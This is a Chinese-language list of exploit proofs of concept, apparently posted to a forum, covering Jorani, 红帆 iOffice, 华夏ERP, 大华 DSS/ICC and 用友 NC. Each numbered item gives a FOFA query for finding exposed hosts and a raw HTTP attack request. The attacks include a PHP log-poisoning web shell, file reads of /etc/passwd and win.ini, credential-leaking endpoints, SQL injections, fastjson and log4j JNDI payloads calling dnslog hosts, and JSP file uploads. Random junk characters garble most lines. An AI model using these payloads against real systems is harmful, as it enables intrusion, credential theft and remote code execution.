0 J& p( v. s/ V$ Q$ ?0 C9 yHost: 127.0.0.1
2 `3 j* a0 J" g) M; l2 }Pragma: no-cache
' ?6 s: [1 W. x; O _Cache-Control: no-cache9 e' M% w" d) ~3 n) \8 o% [
Upgrade-Insecure-Requests: 1
" u- a' `' m7 j2 p6 I; sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+ u. \* S3 [% F6 R' {4 Y3 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 i# ?2 V8 G* V: o* K, V( R* dAccept-Encoding: gzip, deflate
: `. L' {0 s6 i2 f! y- S+ PAccept-Language: zh-CN,zh;q=0.9,en;q=0.8: |5 j" u! N6 ]9 t
Connection: close
$ o3 S! `# _0 R4 w( ]8 b% c# f
( {/ R2 @( ~% X; j( Q12. Jorani < 1.0.2 远程命令执行
( f+ n+ G$ O6 u; dFOFA:title="Jorani"8 X. G8 S2 o1 f& l6 l3 J1 Q
第一步先拿到cookie
( C8 M5 U1 D4 P* j6 v! x5 cGET /session/login HTTP/1.1* f* y6 D: S( b3 ^" Q, ]
Host: 192.168.190.30, B7 e/ Y" b, n0 ~. p$ ^" g
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
4 p7 f) {! G2 m" r$ i5 oConnection: close
q& u* A4 _9 M% o c7 lAccept-Encoding: gzip* Y) S) L! O& {" J8 n" W p
! _2 B3 L# i! C4 k5 ~ c& C/ Y7 o* q$ d
响应中csrf_cookie_jorani用于后续请求
* C, P4 o6 N6 N" z" {HTTP/1.1 200 OK
- q2 Y. U! D5 Y" S: q" l$ j1 T8 c, fConnection: close+ k- z" N- [' H( |; V
Cache-Control: no-store, no-cache, must-revalidate* g0 V" r; d3 G
Content-Type: text/html; charset=UTF-80 l6 L; w' ?- \1 G6 n3 G
Date: Tue, 24 Oct 2023 09:34:28 GMT
# x2 I) }9 w& xExpires: Thu, 19 Nov 1981 08:52:00 GMT
6 A3 a2 V# v* d) _Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
0 J3 [/ A j) o0 d LPragma: no-cache0 [5 V8 ?. s, j7 q a! o& ]
Server: Apache/2.4.54 (Debian)
" |1 H: [3 M+ ^& v5 {$ uSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
" i8 N% @0 f7 B8 x1 _( FSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
7 i% T3 d, {. O: G# G5 p7 `% W; u) cVary: Accept-Encoding" l3 ^, n% i! l) m' z
) _1 P, ]# u. u0 ?# d# {; a9 J9 O1 ]( L5 U
POST请求,执行函数并进行base64编码2 W4 X' a6 v" `2 f/ g
POST /session/login HTTP/1.1
% F; w; w6 V0 N8 P+ ~; L* ]Host: 192.168.190.30/ D, n) l4 x7 E4 X) m: q* N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
+ `; m' Q2 \; L$ @Connection: close
, q9 A1 e+ Y8 B* V' Y$ o8 `Content-Length: 252$ u( {3 w9 D0 z" k9 R. k* e5 J% r6 F
Content-Type: application/x-www-form-urlencoded
, |0 {! J4 c8 l1 p H/ S" GCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
; u) m8 a2 K% R6 E6 R" V# P z& V! AAccept-Encoding: gzip
9 c2 B: c5 U6 Z& ]. y, a2 a% G/ m, y2 {3 ?& \5 ]
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
" x5 U& G( Y) ~& B' I- @: G: @
# a3 S6 \* {6 t% x+ E* N
( h+ A/ h6 ?% S' E: [- b
+ a% b& J1 [0 P8 i8 `2 U向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串) Y+ a5 |0 R3 p& M1 |6 D3 s# @
GET /pages/view/log-2023-10-24 HTTP/1.1
/ j1 i* X. Z! W& BHost: 192.168.190.30, y7 [3 l/ [8 n& @. ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36! f% Y# ^7 M6 A+ ?8 O/ i0 C# C
Connection: close/ v1 @3 `9 s% R& `' T
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
) D8 [' y3 V( v9 uK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=& D J' J9 K! I+ A3 |( Y
X-REQUESTED-WITH: XMLHttpRequest/ V: `3 N4 r8 M( a3 t
Accept-Encoding: gzip/ E! E$ @6 R! C$ S1 t/ U1 n* p" {
; c7 Z5 w7 s: h0 G3 _6 Q2 ^
$ A$ q- Q: G' b9 B; v13. 红帆iOffice ioFileDown任意文件读取0 _" ]" H5 H7 W7 w
FOFA:app="红帆-ioffice"% t* k. E+ Z" l0 `/ w' r2 v
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.13 T/ v$ h- }. m* G
Host: x.x.x.x* D( ^* _9 r' p( n( u l3 H
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
5 c ^; K. K8 Z2 Q& nConnection: close) N) \( d8 I& S' X
Accept: */*% L7 A, f! G) y8 Q
Accept-Encoding: gzip- y' Y9 y, Z! L$ D' ~% h
% D% I9 @8 J$ J% b: l! L; D; y; \+ U" V4 t
14. 华夏ERP(jshERP)敏感信息泄露5 ~+ V; f q ~! Q8 p% e
FOFA:body="jshERP-boot"
$ e$ H, Y& W0 r; \: \. L3 x7 }泄露内容包括用户名密码- }7 O7 O' r( a) M
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1& }% f) u' h- L
Host: x.x.x.x
1 \6 b' L& ^( v# cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
9 o$ p) |7 O1 W7 U; TConnection: close
2 r4 v* ^. P# |: B B) v ?8 SAccept: */*( Z; t1 \/ C |$ _2 X# y* _! n
Accept-Language: en- }7 p) x, V" Z
Accept-Encoding: gzip
$ p c, N9 e: o7 \" y2 t" N" B. L) ~1 N- t( ?) L- w: Q
2 j1 U5 l- m4 [$ @/ ^0 b9 W6 H
15. 华夏ERP getAllList信息泄露
/ C" q( x2 b& I0 TCVE-2024-04908 I0 N( E7 t3 r, K- U/ T9 e
FOFA:body="jshERP-boot"
. u$ }5 ~2 _& h4 I0 H+ |0 N5 m. a泄露内容包括用户名密码& `3 B. J0 D0 |
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.18 B+ i% {/ o/ i% Z- A1 o; `
Host: 192.168.40.130:1001 w$ U2 H9 n( |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36+ P9 F0 U0 c& t/ F9 Y( x
Connection: close4 H2 F1 T6 l/ Y! F2 \3 c0 w* o1 ~
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
/ \0 v' F* N$ x* SAccept-Language: en/ ?" m! U9 l, N$ n+ { r6 x" D
sec-ch-ua-platform: Windows
9 o8 w9 G4 H& p7 kAccept-Encoding: gzip. E. t5 |5 i. p/ v- ^+ p% z, t
' ~# [& [: B' `. t# a
B2 N( o2 c! n# \3 g# O# D16. 红帆HFOffice医微云SQL注入
' u& }5 F, T% e! Q4 u; ]$ E1 qFOFA:title="HFOffice"8 F( Q% J+ p1 I# Z
poc中调用函数计算1234的md5值
1 c0 K2 }. B5 ^" V& \. I" L3 hGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.10 F3 G) d7 W( E9 r% h* k# C' j. I* B
Host: x.x.x.x' V8 ^0 H/ b& B- S: |6 X
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
' b8 O. e" I/ R9 j( c* jConnection: close! e3 Q5 G3 G4 Y7 b y4 [" m
Accept: */*
4 w; C" _$ g0 s5 E- ~ w: G8 LAccept-Language: en
" A! P# P0 ?4 ~: _Accept-Encoding: gzip
# T/ w1 s/ M& H7 ?+ S' m. ?7 F% W; c% D2 g! j! N( {6 a. i+ b
- X5 [# L) S7 X6 r# [3 @) K17. 大华 DSS itcBulletin SQL 注入+ [, I" ]! t5 y6 t M4 s/ D. `
FOFA:app="dahua-DSS"
9 _7 p" M# B, X1 ~3 K7 APOST /portal/services/itcBulletin?wsdl HTTP/1.1 {6 T+ O9 ^4 n: k3 B+ m) g
Host: x.x.x.x
9 e* Z1 D0 u0 ]& [1 e |( oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 T' C1 h# V3 L0 ]& D0 h
Connection: close
8 K/ N% {4 [. O2 n% a0 CContent-Length: 345
# i- S2 ^2 L6 U4 d' b! D. JAccept-Encoding: gzip* L! e# y5 p: j" s; r" U- @1 |
" d2 ] X2 c) }+ T5 n<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
% y& `8 E* a1 @6 Z<s11:Body>( X3 l- N8 z$ a2 h. ?
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
U6 N* D! h; w& Z <netMarkings>
9 m+ e" W" E- D5 N2 [$ T3 J# I6 N (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1' \6 j2 B( Z: }& Q/ c
</netMarkings> a4 \! h! u. [$ m5 {& J
</ns1:deleteBulletin>
" R7 |+ D/ B# r% ^, @+ ] </s11:Body>0 G& [8 z- Q1 K. ^. A) V) f0 I
</s11:Envelope>, c) ~) H k, Y, P4 ~2 B# k) S1 b
5 p# @# h9 }* ]7 @0 Z" I
! C0 p4 C" S- X, I$ U18. 大华 DSS 数字监控系统 user_edit.action 信息泄露! b% A8 L# ]; Q
FOFA:app="dahua-DSS": t' r$ G8 x1 `! t, I
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1- j$ @5 d2 J! T' Q4 {
Host: your-ip
a$ b: h8 [4 F& a7 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, Y( f m0 ~* ]+ ~" F( P. A! RAccept-Encoding: gzip, deflate
) {' T. p9 B# e; k3 lAccept: */*7 U; e& L1 V7 y( e/ N3 L0 B) r
Connection: keep-alive9 B1 W x7 r8 w+ N( _3 I
4 d5 g0 n, r" z& @
% A. G/ T5 R" x1 g& Y4 e) C/ r$ U6 K! |: I* o7 Z7 ^7 M- j
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入2 C# ^( T8 Q% ^9 |: @0 ]
FOFA:app="dahua-DSS"$ P. P: _: D1 y$ T
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
- Y0 s# W" r* \9 o" eHost:
# P& r* g& H$ J9 z; ]2 g) OUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36- e# R Q$ p, \+ P4 [) ~
Accept-Encoding: gzip, deflate
' B2 ~: J4 E4 j! B/ E: lAccept: */*
* _4 V( C- Z5 [8 O9 z- qConnection: keep-alive; |: c3 S; Y& g( @! L
) n$ q. P$ _5 \' n4 |: {
/ f* E+ t8 h+ l1 R r ]+ e* Y20. 大华ICC智能物联综合管理平台任意文件读取
: ?* G" L1 I/ |) }FOFA:body="*客户端会小于800*"
3 a8 U) J" F, S, W& |GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
3 ]: d, F% b" O& r. K# oHost: x.x.x.x* X W3 X" Q& u m
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: j# h' t- w' PConnection: close9 Y& r& c% U, e7 s( d' O5 h+ G2 q( C
Accept: */*3 \! M( P0 |' l7 e7 L# s
Accept-Language: en
1 e' ^ i9 e2 |& V& AAccept-Encoding: gzip
" }" {1 f" C$ Q6 z& e e$ _! o5 _3 V' q: \* ?
' X6 a9 i: ]# t9 d" M* h
21. 大华ICC智能物联综合管理平台random远程代码执行
1 u1 P. w, q qFOFA:icon_hash="-1935899595"8 Z% f; T9 Q0 V7 T. X
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1( I) |) c k! N2 f9 w9 K
Host: x.x.x.x* ^, F8 ~7 t% {5 K l$ D- t; U. i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 `3 ?8 s: G. B5 S- F8 zContent-Length: 161
& `. W q& Z$ Z5 _) iAccept-Encoding: gzip8 G- n+ J1 t% X) }6 U- T: A
Connection: close
' ]& [+ O# I4 k" `5 w: w h; _Content-Type: application/json;charset=utf-8; j; D Q7 l n+ Q1 I- Q# p
/ w' B+ c! R8 W6 ]
{7 a& Q# B" p6 t) G* K
"a":{: _" a9 B; \* W$ s- y( W
"@type":"com.alibaba.fastjson.JSONObject",
) O y& x' L! I. f2 u f" h, J" {7 p {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
/ x8 f- B6 p* I. N8 I& d }""" l D, _! a H! S4 G
}! X. l) E" C- R @7 M/ ~1 p: ]
Z( Z3 M+ e% a: p. |7 N3 _% E; O0 H1 S3 R; @+ A
22. 大华ICC智能物联综合管理平台 log4j远程代码执行% y: `9 t3 a; d
FOFA:icon_hash="-1935899595"; Z* q" r% {" ^0 h d* w- W
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1; {7 `8 r6 k8 d% Z% A0 S! [9 X) u' y
Host: your-ip* ]1 `4 [2 h# U P, I v- G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
! A1 S5 N! S4 ~$ V' tContent-Type: application/json;charset=utf-8
, z1 Q' V/ L5 T$ y* Z3 ~: G
; y9 J* n6 Y- g I3 y! A{ _9 g. r6 N5 B2 C' |
"loginName":"${jndi:ldap://dnslog}"
$ i) S$ Q2 d4 [6 Z' q- C' z}
6 o+ H) ]# U7 q! {
8 k" C/ Q: j& r/ s) o7 ]
/ [# C/ t' {( x6 D G8 |6 c: c c8 g- {; \0 w9 m' Q
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行! }5 y6 N7 a6 n: x( ]/ S+ m' Q
FOFA:icon_hash="-1935899595"
}) b, U+ W Q1 BPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1+ V& {3 W! @6 T. U# \: I5 B0 K
Host: your-ip( A3 d' q( B' o% ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 `5 u* a. F( S0 z
Content-Type: application/json;charset=utf-8
# t% M7 r+ Y: i9 MAccept-Encoding: gzip3 x/ f) N# k* V a. @7 |
Connection: close& T; T$ ^- i* s/ i+ N
! ^. o3 m, y4 d) o9 J) b+ p{$ D1 L* B% U" n+ T4 Z E v! M, ]
"a":{ M* K: t7 Y$ ^# x/ h" b" w' {' Z
"@type":"com.alibaba.fastjson.JSONObject",
6 {& U; T+ o' }& _* {3 I: \. X {"@type":"java.net.URL","val":"http://DNSLOG"}2 j9 B0 A1 J' E: j
}""* ?2 b9 S8 V( G- Y2 |0 s1 o
}# v1 e" d5 ?5 v; C) Q# P
! k* Z2 W' m8 m$ i+ @/ I5 g# [
5 h+ S7 m0 ~1 [
24. 用友NC 6.5 accept.jsp任意文件上传
4 { }3 F# @5 s9 o5 WFOFA:icon_hash="1085941792"
: ], d- H9 d0 {. w- pPOST /aim/equipmap/accept.jsp HTTP/1.1
9 P' H$ ^2 ?9 g3 aHost: x.x.x.x# J8 A+ Y5 N5 e4 o- }+ S
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
9 F2 g) ~/ {1 v7 DConnection: close' ~! s0 U9 ~5 E+ |& S6 q. B$ L
Content-Length: 4496 y6 S/ G) A5 R0 X: C* e" P- K {' @
Accept: */*6 M; X/ x- d: H* W
Accept-Encoding: gzip
. z! F0 [" q- N! [* B5 I7 DContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
0 l( o+ _4 v. u }% f& u( c) R; R5 ^% g3 d
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc) z1 R' p( e E' v* V) x0 M9 p
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"3 q, J" X. `* a$ @! W8 M/ Y0 g
Content-Type: text/plain$ R& V$ ^/ X8 }1 y) Y9 d* y& R
. F1 K7 d/ E& R @0 q
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
, B( |9 R) F, u-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
5 q. Z7 I7 c1 ?Content-Disposition: form-data; name="fname". d, \+ c5 w5 K7 N3 A- {$ j
: Z3 m$ n" z: H( \" O. [
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
; Q1 Q+ z- w0 `( Q) B. x( F-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
7 a7 G; ~9 C- z, r: O2 C
& p4 A6 J9 h7 f9 O+ v
- Y/ v/ Q! a! Z6 F9 u7 j. Z' u, i+ |- ?25. 用友NC registerServlet JNDI 远程代码执行' ]% s) J r" l- r
FOFA:app="用友-UFIDA-NC"
+ R& t: t: H4 A2 e) F7 K; D; fPOST /portal/registerServlet HTTP/1.1
; d% g5 r& P# {Host: your-ip) W: X0 T; N: ~/ g, C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
! f* I5 M7 f8 E' t- g1 m- qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
. b4 O- c! T: \' Y( i+ _5 ?- }2 SAccept-Encoding: gzip, deflate
; M. ?" R5 n. `6 XAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
* k$ j/ \- n# b9 G" wContent-Type: application/x-www-form-urlencoded: N1 ]/ B+ l" E
8 e c9 C% c$ @: ]/ R2 @type=1&dsname=ldap://dnslog& i4 R7 N+ R% Q) s& Z- p
/ G; O& w) Z8 F) _3 Z+ y
- P: Q8 ~& n. w0 V% ^* ~, K7 {9 V" n! f5 p( q9 i
26. 用友NC linkVoucher SQL注入
' E6 n _7 s% G; XFOFA:app="用友-UFIDA-NC"& s4 H s1 i) D; C" X$ E
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1* z' }/ l1 [* z: E7 A1 f$ h/ t
Host: your-ip3 s' G; b% `1 N- k& F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, T1 H7 o' l6 v! y$ L7 D- Q
Content-Type: application/x-www-form-urlencoded: X3 j. k w1 j V! D1 R c
Accept-Encoding: gzip, deflate; o- N5 |$ @; r0 ?- ^; s7 n
Accept: */*# {* l7 {* M4 C
Connection: keep-alive% @1 }% ~5 X* w$ e+ R2 v. K
2 g. g0 j8 V8 b4 l, j" D$ W$ X
w6 g$ n2 D6 R9 I- h) R5 L27. 用友 NC showcontent SQL注入6 O, _ V* Z" {/ Q. |$ w
FOFA:icon_hash="1085941792"
0 e7 w& B" P. R" NGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
, l2 ]1 t$ I3 F2 l1 c0 ?! qHost: your-ip" g! z" z* Z* |0 f1 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( k0 c" f0 x! ^5 m+ vAccept-Encoding: identity, @0 _8 R5 @- p0 L m8 |3 z
Connection: close! N; a+ h9 c0 ]$ d% {2 U. }
Content-Type: text/xml; charset=utf-8( H% o6 {& h+ g& A' V1 X6 C c
G' z" h3 w$ _; N6 f4 B X3 x' w5 c* ]( ?$ o. Q, S' D
28. 用友NC grouptemplet 任意文件上传: B$ u7 M, _, D
FOFA:icon_hash="1085941792"
% L; W* ?; m) M. m( D, _: `POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
. S" E7 `4 M# [& W: Z3 Y' G9 f' Q; N( ^/ uHost: x.x.x.x6 k8 q8 T. J. b- a6 g* i3 i7 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
' B& S8 L, V: ?2 v3 LConnection: close5 B4 m0 U7 X$ ]7 q0 G. {. J
Content-Length: 268' B: \4 o9 V8 d0 H- Q
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
. G+ ^1 T" w( A( ?Accept-Encoding: gzip6 |2 R' A$ k" z5 U
% ]4 x& k: c* I$ _# \' i) x------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
% |& c7 l% v" v& v2 {Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
+ z7 i9 F7 b! O6 D9 K# eContent-Type: application/octet-stream% h/ o9 Q. y4 G. F5 a' g: m
; K. d8 Q- A8 W6 Z O% j* W0 \
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
* C1 E- s2 }% Y1 C------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
. |$ q. [ ^1 g, t+ X3 R# p% u( w5 s" |" m1 D) h
' e0 h8 o$ p/ s( i" K
/uapim/static/pages/nc/head.jsp- x! }; U$ ^% }% Y
: h2 l* ?' p V% }
29. 用友NC down/bill SQL注入1 u9 |( o* [, E6 }& G) |0 N2 x
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
9 g* f) P7 H3 n$ L3 ^GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
$ T4 F( y8 ?7 E# V5 \Host: your-ip
$ c `" ~& h) @. d( WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% B2 T5 Y( t8 h$ E6 M: l
Content-Type: application/x-www-form-urlencoded
! N* J6 X1 C. H' K$ A5 C( UAccept-Encoding: gzip, deflate
6 Y; u# F- O& T. ^9 F! aAccept: */*; A* @0 {1 D* R5 k
Connection: keep-alive
# |4 y# A4 U8 b1 Q* f: \) Y! u) a
, ]2 m0 D8 m% k- N
30. 用友NC importPml SQL注入
9 I% T7 j/ a0 K* @FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"+ P1 N2 D8 c/ g
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
$ S) b' [( U$ E2 z# ^1 bHost: your-ip8 Y* T5 C! C8 B! R& {
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
; [0 H' b9 g% S' _ A; }9 y; Q% ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.363 ]3 @5 k3 P- |( b+ w/ x# h" z
Connection: close1 r( L" _7 o& V3 M* e! P* P3 u
/ s1 |3 |; L- F' U
------WebKitFormBoundaryH970hbttBhoCyj9V4 _* d! k" D5 c3 t: Z
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
; {9 z- f$ O: q) \5 wContent-Type: image/jpeg
4 B0 p. a! e4 z9 W------WebKitFormBoundaryH970hbttBhoCyj9V--# O. e% E3 B4 |
$ H' R: d2 [9 H! q& U, w- V
" H7 r$ {" n' ~1 w8 v
31. 用友NC runStateServlet SQL注入
; g. i( }& _" J5 Rversion<=6.5- D5 Q9 M, b5 b+ K* d C$ W
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
; K! n5 O5 h0 H' Q/ p- @) NGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.14 l( M% l% a' C6 H; r
Host: host
' v" K8 Z2 I+ E$ Z# _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36( j* [' x) q( V: O0 G) N: \ F" l
Content-Type: application/x-www-form-urlencoded
d4 N* Z; C: Z+ | d0 m
1 e7 k7 [+ g2 P
( |+ C) V/ ?$ n32. 用友NC complainbilldetail SQL注入( s ~/ b8 k+ U# Y; i+ e0 c# z1 ?5 C
version= NC633、NC65
0 `* ^0 B" }% w, @FOFA:app="用友-UFIDA-NC"3 L& i/ A5 V- `! A$ y
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
1 H' D) g2 c" z2 L3 AHost: your-ip- }, C: [' O2 C6 s7 S/ P- P6 j2 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
~ ]! s: u# S% Z( R7 FContent-Type: application/x-www-form-urlencoded
# J4 p$ l' m/ B- P9 B& EAccept-Encoding: gzip, deflate
3 Q# ]! K! m) m+ v p$ G, fAccept: */*
$ h p. k8 a9 g! B- XConnection: keep-alive3 T. ~" _5 F" O/ y3 y
2 h. v3 A7 G" w3 ]& {# r- c: r" D+ i# ~ [( U2 m, O6 n
33. 用友NC downTax/download SQL注入
1 K8 M! W) l+ {' {% V9 _. Eversion:NC6.5FOFA:app="用友-UFIDA-NC"
8 u8 p' H+ k; sGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
% g2 N% g& C, c3 D( x" P( aHost: your-ip
( Z- w- ~8 r. x8 @' _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 q: h, C, n5 X* m/ @/ _! wContent-Type: application/x-www-form-urlencoded) ^2 i7 d2 l6 L3 a; f
Accept-Encoding: gzip, deflate
( g3 L' L9 L; S i! jAccept: */*/ d5 U. \( F+ l6 t
Connection: keep-alive
8 B A$ Z- ~/ f. ~; Y( J/ F4 s- b6 b( w8 E/ ^/ |* n
$ Y) k" o' @1 L
34. 用友NC warningDetailInfo接口SQL注入3 j+ s( B5 P' H2 G( O& P
FOFA:app="用友-UFIDA-NC"
8 y- z; M8 H0 C( @GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
( m/ m& [& o: d& @Host: your-ip% ]2 ~! a/ ?4 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% r% @! C8 ^2 _6 f' [' vContent-Type: application/x-www-form-urlencoded
. i7 ]& X" {+ G- @3 [6 @! `Accept-Encoding: gzip, deflate
! i" n* x& C9 A# v1 Z8 ^Accept: */*5 s' Z! C1 f! U+ f$ G+ s
Connection: keep-alive
6 Q# O3 L4 F" H K
. X2 W8 k( Y$ m S+ y
8 n8 h( o4 k$ A( A1 L2 n6 ]35. 用友NC-Cloud importhttpscer任意文件上传3 b5 A% K9 v5 `0 p" k1 b6 U: y5 G
FOFA:app="用友-NC-Cloud"
